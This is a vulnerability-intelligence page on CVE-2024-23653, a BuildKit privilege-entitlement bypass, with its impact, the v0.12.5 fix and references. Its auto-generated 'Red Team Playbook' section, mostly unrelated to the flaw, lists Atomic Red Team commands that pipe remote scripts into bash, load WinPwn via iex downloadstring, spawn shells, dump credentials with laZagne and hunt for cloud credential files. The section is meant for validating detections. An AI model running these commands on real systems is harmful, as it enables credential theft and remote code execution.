CVE-2024-23653
Overview
This vulnerability is an authorization bypass in the BuildKit API that manages container execution privileges. The root cause lies in improper enforcement of the `security.insecure` entitlement, allowing elevated privileges to be granted without the required configuration and user consent. The affected component is the BuildKit API responsible for running interactive containers based on built images.
Vulnerability Description
BuildKit is a toolkit for converting source code to build artifacts in an efficient, expressive and repeatable manner. In addition to running containers as build steps, BuildKit also provides APIs for running interactive containers based on built images. It was possible to use these APIs to ask BuildKit to run a container with elevated privileges. Normally, running such containers is only allowed if special `security.insecure` entitlement is enabled both by buildkitd configuration and allowed by the user initializing the build request. The issue has been fixed in v0.12.5 . Avoid using BuildKit frontends from untrusted sources.
Impact
An unauthenticated attacker can remotely execute containers with elevated privileges via BuildKit's API, bypassing intended security restrictions. This enables full compromise of the build environment, including arbitrary code execution with high privileges, potentially leading to data exfiltration or lateral movement within the infrastructure. The attack requires network access to the BuildKit API and no user interaction. The CVSS vector (AV:N/AC:L/PR:N/UI:N) confirms the vulnerability is remotely exploitable without authentication or user interaction.
Solution
Upgrade moby buildkit to version 0.12.5 or later, where the entitlement enforcement flaw is corrected. Refer to the official GitHub security advisory GHSA-wr6v-9f75-vh2g and the release notes at https://github.com/moby/buildkit/releases/tag/v0.12.5 for detailed patch instructions. Additionally, avoid using BuildKit frontends from untrusted sources to mitigate exploitation risks prior to patching.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the BuildKit toolkit arises from improper handling of elevated privileges when utilizing its APIs for running interactive containers. BuildKit is designed to facilitate the efficient conversion of source code into build artifacts, leveraging containerization to streamline the build process. However, the flaw allows unauthorized users to execute containers with elevated privileges, which should typically be restricted to users with explicit permissions. This misconfiguration can occur if the `security.insecure` entitlement is enabled in the buildkitd configuration without appropriate safeguards, leading to a significant security risk.
Attackers can exploit this vulnerability through several vectors. By leveraging the APIs provided by BuildKit, an adversary could initiate a build request that bypasses the intended security measures. For instance, if an attacker gains access to a BuildKit instance, they could send a crafted request to run a container with elevated privileges, potentially leading to unauthorized access to the host system. This exploitation could be particularly damaging in environments where BuildKit is integrated into continuous integration/continuous deployment (CI/CD) pipelines, as it could allow an attacker to manipulate the build process, inject malicious code, or gain control over sensitive data and infrastructure.
The real-world impact of this vulnerability is profound, especially for organizations that rely on BuildKit for their software development processes. The potential for unauthorized access to critical systems can lead to data breaches, service disruptions, and significant financial losses. Moreover, the exploitation of this vulnerability could result in reputational damage, as stakeholders may lose trust in an organization’s ability to secure its development environments. The high CVSS score of 9.8 underscores the severity of the risk, indicating that organizations must prioritize remediation efforts to protect their assets.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, it is crucial to upgrade to the fixed version of BuildKit (v0.12.5) to eliminate the flaw. Regularly auditing configurations and ensuring that the `security.insecure` entitlement is disabled unless absolutely necessary can further reduce the risk of exploitation. Additionally, organizations should restrict access to BuildKit APIs, ensuring that only trusted users and systems can initiate build requests. Employing network segmentation and monitoring for unusual API usage can also help detect potential exploitation attempts early.
In conclusion, the vulnerability within BuildKit represents a critical threat to organizations leveraging this toolkit for their software development processes. By understanding the technical details, potential attack vectors, and real-world implications, organizations can take proactive steps to mitigate risks. Implementing robust detection and remediation strategies is essential to safeguard against unauthorized access and maintain the integrity of development environments. The evolving landscape of cybersecurity threats necessitates continuous vigilance and adaptation to protect valuable assets effectively.
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2024-23653, with our telemetry indicating a sharp increase in detection activity linked to this BuildKit vulnerability. Although the overall EPSS score remains stable, the emergence of new proof-of-concept exploits on public repositories signals growing adversary interest and capability to weaponize this flaw. This development is significant for defenders because it suggests that threat actors are actively refining techniques to leverage the elevated privilege container execution vector, increasing the likelihood of successful unauthorized access within compromised build environments. The heightened detection trend underscores an evolving threat landscape where exploitation attempts may become more frequent and sophisticated, warranting increased monitoring despite the unchanged baseline risk metrics. Consequently, the threat level associated with CVE-2024-23653 should be considered elevated in operational contexts where BuildKit is deployed, as the potential for impactful compromise has demonstrably increased.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Mobyproject | Buildkit | All |
cpe:2.3:a:mobyproject:buildkit:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
666asd/CVE-2024-23653
|
666asd | 4 | 1 | 2024-12-13 | View |
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-23653 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/moby/buildkit/security/advisories/GHSA-wr6v-9f75-vh2g |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/moby/buildkit/pull/4602 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/moby/buildkit/releases/tag/v0.12.5 |